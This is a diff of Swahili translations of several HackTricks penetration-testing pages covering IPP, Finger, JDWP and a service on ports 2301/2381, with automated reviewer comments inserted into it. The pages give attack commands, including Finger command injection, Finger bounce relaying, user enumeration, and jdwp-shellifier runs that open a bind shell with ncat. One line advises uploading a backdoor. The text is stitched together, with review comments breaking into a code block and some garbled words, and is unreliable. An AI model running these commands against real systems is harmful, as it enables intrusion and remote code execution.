Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Itifaki ya Uchapishaji ya Mtandao \(IPP\)
# Internet Printing Protocol \(IPP\)
**Itifaki ya Uchapishaji ya Mtandao (IPP)**, kama ilivyoelezwa katika **RFC2910** na **RFC2911**, inatumika kama msingi wa uchapishaji kupitia mtandao. Uwezo wake wa kupanuliwa unadhihirishwa na maendeleo kama **IPP Kila Mahali**, ambayo inalenga kusawazisha uchapishaji wa simu na wa wingu, na uanzishwaji wa nyongeza kwa **uchapishaji wa 3D**.
**Internet Printing Protocol (IPP)**, kama ilivyoainishwa katika **RFC2910** na **RFC2911**, inatumika kama msingi wa uchapishaji kupitia mtandao. Uwezo wake wa kupanuliwa unaonyeshwa na maendeleo kama **IPP Everywhere**, ambayo inalenga kuimarisha uchapishaji wa simu na wingu, na utambulisho wa nyongeza za **uchapishaji wa 3D**.
Kwa kutumia itifaki ya **HTTP**, IPP inanufaika na mazoea ya usalama yaliyowekwa ikiwa ni pamoja na **uthibitishaji wa msingi/digest** na **ufichamishi wa SSL/TLS**. Vitendo kama vile kuwasilisha kazi ya uchapishaji au kuuliza hali ya printer hufanywa kupitia **ombi za POST za HTTP** zilizoelekezwa kwa seva ya IPP, ambayo inafanya kazi kwenye **bandari 631/tcp**.
Kwa kutumia protokali ya **HTTP**, IPP inafaidika na mbinu za usalama zilizowekwa ikiwa ni pamoja na **uthibitishaji wa msingi/digest** na **SSL/TLS encryption**. Vitendo kama kuwasilisha kazi ya uchapishaji au kuuliza hali ya printer vinafanywa kupitia **HTTP POST requests** zinazolengwa kwenye seva ya IPP, ambayo inafanya kazi kwenye **port 631/tcp**.
Utekelezaji maarufu wa IPP ni **CUPS**, mfumo wa uchapishaji wa chanzo wazi unaotumiwa sana kwenye usambazaji tofauti za Linux na OS X. Ingawa ni muhimu, IPP, kama LPD, inaweza kutumiwa vibaya kuhamisha maudhui yanayoweza kuwa na nia mbaya kupitia faili za **PostScript** au **PJL**, ikionyesha hatari ya usalama inayowezekana.
Utekelezaji maarufu wa IPP ni **CUPS**, mfumo wa uchapishaji wa chanzo wazi unaojulikana katika usambazaji mbalimbali za Linux na OS X. Licha ya matumizi yake, IPP, kama LPD, inaweza kutumika vibaya kuhamasisha maudhui mabaya kupitia **PostScript** au **PJL files**, ikionyesha hatari ya usalama inayoweza kutokea.
```python
# Example of sending an IPP request using Python
import requests
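Review bot: the new sentence `... inaweza kutumika vibaya kuhamasisha maudhui mabaya kupitia **PostScript** au **PJL files**` changes "kuhamisha" (to transfer, which is what the English source says about delivering malicious content) to "kuhamasisha" (to promote or motivate), which alters the meaning; revert that word. The same paragraphs now leave `SSL/TLS encryption`, `HTTP POST requests` and `port 631/tcp` in English mid-sentence where the old version had Swahili phrasing, and the title `# Internet Printing Protocol \(IPP\)` is English with escaped parentheses on a page whose body is Swahili; decide whether technical terms stay English and apply that uniformly. Keeping `IPP Everywhere` as a product name rather than the old literal `IPP Kila Mahali` is correct.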
@ -31,20 +32,19 @@ data = b"..." # IPP request data goes here
response = requests.post(url, headers=headers, data=data, verify=True)
print(response.status_code)
```
Ikiwa unataka kujifunza zaidi kuhusu [**kudukua printa soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
Ikiwa unataka kujifunza zaidi kuhusu [**kuvamia printers soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za uvamizi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Bandari ya Chaguo:** 2301,2381
**Default Port:** 2301,2381
# **Nywila za Chaguo**
# **Default passwords**
{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %}
# Faili za Usanidi
# Faili za Config
```text
path.properties
mx.log
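Review bot: `# Faili za Config` replaces `# Faili za Usanidi`, which was proper Swahili for "configuration files", with a mixed-language heading; revert to `Usanidi` or keep the English `Config Files`, but not a hybrid. Both `# **Default passwords**` and `# Faili za Config` are level-one headings on a page that has no title line of its own (the file opens with the hint block and `**Default Port:** 2301,2381`), so readers never see which product these ports belong to; add a title naming the service and demote the two section headings to `##`.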
@ -29,16 +30,17 @@ pg_hba.conf
jboss-service.xml
.namazurc
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,50 +1,51 @@
# 79 - Kupima Kidole
# 79 - Pentesting Finger
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Maelezo Muhimu**
## **Basic Info**
Programu/Huduma ya **Kidole** hutumiwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, maelezo yanayotolewa ni pamoja na **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya kesi, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alijiunga, kipindi cha kutokuwa na shughuli (muda wa kutokuwa na shughuli), wakati wa mwisho mtumiaji alisoma barua pepe, na maudhui ya faili za mpango na mradi wa mtumiaji.
Programu/huduma ya **Finger** inatumika kwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alipoingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho ambapo barua pepe ilisomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.
**Bandari ya chaguo-msingi:** 79
**Default port:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Uchambuzi**
## **Uhesabu**
### **Kukamata Bango/Unganisho Msingi**
### **Kuchukua Bango/Kuunganisha Msingi**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Uthibitishaji wa Watumiaji**
### **Uainishaji wa watumiaji**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Badala yake, unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
Mbadala unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap inatekeleza script kwa kutumia script za msingi**
#### **Nmap tekeleza script kwa kutumia scripts za default**
### Metasploit hutumia mbinu zaidi kuliko Nmap
### Metasploit inatumia hila zaidi kuliko Nmap
```
use auxiliary/scanner/finger/finger_users
```
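Review bot: the section heading changes from `## **Uchambuzi**` (analysis) to `## **Uhesabu**` (counting); neither conveys "Enumeration" well, and a word for listing or the untranslated "Enumeration" would read better to a Swahili pentester. The heading `#### **Nmap tekeleza script kwa kutumia scripts za default**` is a level-four heading followed by no command at all, and the next heading `### Metasploit inatumia hila zaidi kuliko Nmap` is level three, so the levels are inverted; either put the nmap invocation under its heading or fold that line into the Metasploit section and keep both at the same level. The `finger @<Victim>`, `finger-user-enum.pl` and `use auxiliary/scanner/finger/finger_users` blocks are unchanged and fine.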
@ -52,28 +53,29 @@ use auxiliary/scanner/finger/finger_users
* `port:79 USER`
## Utekelezaji wa Amri
## Utekelezaji wa amri
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Kupiga Kidole
## Finger Bounce
[Tumia mfumo kama kituo cha kupiga kidole](https://securiteam.com/exploits/2BUQ2RFQ0I/)
[Tumia mfumo kama relay ya finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
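Review bot: keeping `## Finger Bounce` as the technique's English name is an improvement over the literal `## Kupiga Kidole`, and `relay ya finger` is clear. The `## Utekelezaji wa amri` section lists `finger "|/bin/id@example.com"` and `finger "|/bin/ls -a /@example.com"` without a sentence saying that this depends on the fingerd implementation passing the query to a shell, so a reader who gets no output cannot tell whether the target is unaffected or the test was wrong; one line of context on when to expect a result, and that the fix is to not expose fingerd at all, would make the section usable.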

View file

@ -1,60 +1,63 @@
# Pentesting JDWP - Itifaki ya Uunganishaji wa Java Debug Wire
# Pentesting JDWP - Java Debug Wire Protocol
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kudukua
## Exploiting
Udanganyifu wa JDWP unategemea **ukosefu wa uwakilishi na kusimbwa kwa itifaki**. Kawaida inapatikana kwenye **bandari 8000**, lakini bandari nyingine ni sawa. Uunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari ya lengo. Ikiwa huduma ya JDWP iko hai, itajibu na herufi sawa, ikithibitisha uwepo wake. Hatua hii ya mwanzo inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.
JDWP exploitation inategemea **ukosefu wa uthibitisho na usimbuaji** wa protokali. Kwa kawaida hupatikana kwenye **bandari 8000**, lakini bandari nyingine zinaweza kuwa. Muunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari lengwa. Ikiwa huduma ya JDWP inafanya kazi, inajibu kwa kutumia string ile ile, ikithibitisha uwepo wake. Hii handshake inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.
Kuhusu utambuzi wa mchakato, kutafuta herufi "jdwk" kwenye michakato ya Java inaweza kuashiria kikao cha JDWP kilichopo.
Kwa upande wa utambuzi wa mchakato, kutafuta string "jdwk" katika michakato ya Java kunaweza kuashiria kikao cha JDWP kinachofanya kazi.
Zana inayotumiwa ni [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Unaweza kuitumia na vigezo tofauti:
Chombo kinachotumika ni [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Unaweza kukitumia na vigezo tofauti:
```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
Nimegundua kuwa matumizi ya `--break-on 'java.lang.String.indexOf'` yanafanya shambulizi kuwa **thabiti** zaidi. Na ikiwa una nafasi ya kupakia mlango wa nyuma kwenye mwenyeji na kuutekeleza badala ya kutekeleza amri, shambulizi litakuwa thabiti zaidi.
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
## Maelezo zaidi
## More details
**Hii ni muhtasari wa [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Angalia kwa maelezo zaidi.
1. **JDWP Maelezo**:
- Ni itifaki ya mtandao ya pakiti, hasa ya kusawazisha.
- Haina uthibitishaji na kificho, ikifanya kuwa hatarishi wakati inapofichuliwa kwenye mtandao wenye nia mbaya.
1. **JDWP Overview**:
- Ni protokali ya mtandao ya binary inayotumia pakiti, hasa synchronous.
- Haina uthibitisho na usimbuaji, hivyo inakuwa hatarini inapokuwa wazi kwa mitandao ya adui.
2. **JDWP Handshake**:
- Mchakato rahisi wa kupeana mikono hutumiwa kuanzisha mawasiliano. Kamba ya ASCII yenye herufi 14 "JDWP-Handshake" inabadilishwa kati ya Debugger (mteja) na Debuggee (seva).
- Mchakato rahisi wa handshake unatumika kuanzisha mawasiliano. Mstari wa ASCII wenye herufi 14 “JDWP-Handshake” unabadilishana kati ya Debugger (mteja) na Debuggee (server).
3. **Mawasiliano ya JDWP**:
- Ujumbe una muundo rahisi na sehemu kama Urefu, Kitambulisho, Bendera, na Seti ya Amri.
- Thamani za Seti ya Amri zinaanzia 0x40 hadi 0x80, zikionyesha hatua na matukio tofauti.
3. **JDWP Communication**:
- Ujumbe una muundo rahisi wenye maeneo kama Length, Id, Flag, na CommandSet.
- Thamani za CommandSet zinaanzia 0x40 hadi 0x80, zik representing hatua na matukio tofauti.
4. **Udanganyifu**:
- JDWP inaruhusu kupakia na kuita darasa na kanuni ya kiholela, ikileta hatari za usalama.
- Makala inaelezea mchakato wa udanganyifu katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka alama za kusitisha, na kuita njia.
4. **Exploitation**:
- JDWP inaruhusu kupakia na kuita madarasa na bytecode zisizo na mipaka, ikileta hatari za usalama.
- Makala inaelezea mchakato wa unyakuzi katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka breakpoints, na kuita mbinu.
5. **Udanganyifu katika Maisha Halisi**:
- Licha ya ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kudanganywa katika mazingira halisi, kama inavyothibitishwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.
- Kigezo cha udanganyifu kilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Kanuni kwa Mbali (RCE) unaoweza kutegemewa.
5. **Real-Life Exploitation**:
- Licha ya uwezekano wa ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kutumika katika hali halisi, kama inavyoonyeshwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.
- Skripti ya unyakuzi ilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Msimbo wa K remote (RCE) wa kuaminika.
6. **Athari za Usalama**:
- Kuwepo kwa huduma za JDWP zilizofunguliwa kwenye mtandao kunasisitiza umuhimu wa ukaguzi wa usalama mara kwa mara, kuzima utendaji wa kurekebisha katika uzalishaji, na mipangilio sahihi ya firewall.
6. **Security Implications**:
- Uwepo wa huduma za JDWP zilizo wazi kwenye mtandao unaonyesha umuhimu wa ukaguzi wa usalama wa mara kwa mara, kuzima kazi za debug katika uzalishaji, na usanidi sahihi wa firewall.
### **Marejeo:**
### **References:**
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
